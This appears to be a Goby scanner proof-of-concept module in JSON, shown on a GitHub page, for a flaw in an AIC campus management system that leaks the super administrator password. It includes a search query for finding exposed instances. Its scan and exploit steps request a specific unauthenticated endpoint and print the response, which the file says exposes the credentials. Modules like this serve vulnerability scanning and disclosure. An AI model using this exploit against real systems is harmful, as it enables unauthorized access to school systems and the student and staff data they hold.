-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy pathAIC-Intelligent-Campus-System-Password-Leak.json
81 lines (81 loc) · 1.98 KB
/
AIC-Intelligent-Campus-System-Password-Leak.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
{
"Name": "AIC Intelligent Campus System Password Leak",
"Description": "Divulge super administrator password",
"Product": "AIC智能校园系统",
"Homepage": "http://aic-it.com/",
"DisclosureDate": "2021-05-22",
"Author": "fengyue",
"GobyQuery": "title=\"AIC智能校园系统\"",
"Level": "2",
"Impact": "<p>Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br></p>",
"Recommandation": "<p><span style=\"color: var(--primaryFont-color);\">1. First, delete the leaked account password interface.</span><br></p><p>2. Contact the manufacturer to upgrade the system.</p><p>3. Modify the weak password.</p>",
"References": null,
"HasExp": true,
"ExpParams": [
{
"name": "查看",
"type": "input",
"value": "点击验证",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/datacenter/dataOrigin.ashx?c=login",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "卡号",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/datacenter/dataOrigin.ashx?c=login",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"Disclosure of Sensitive Information"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}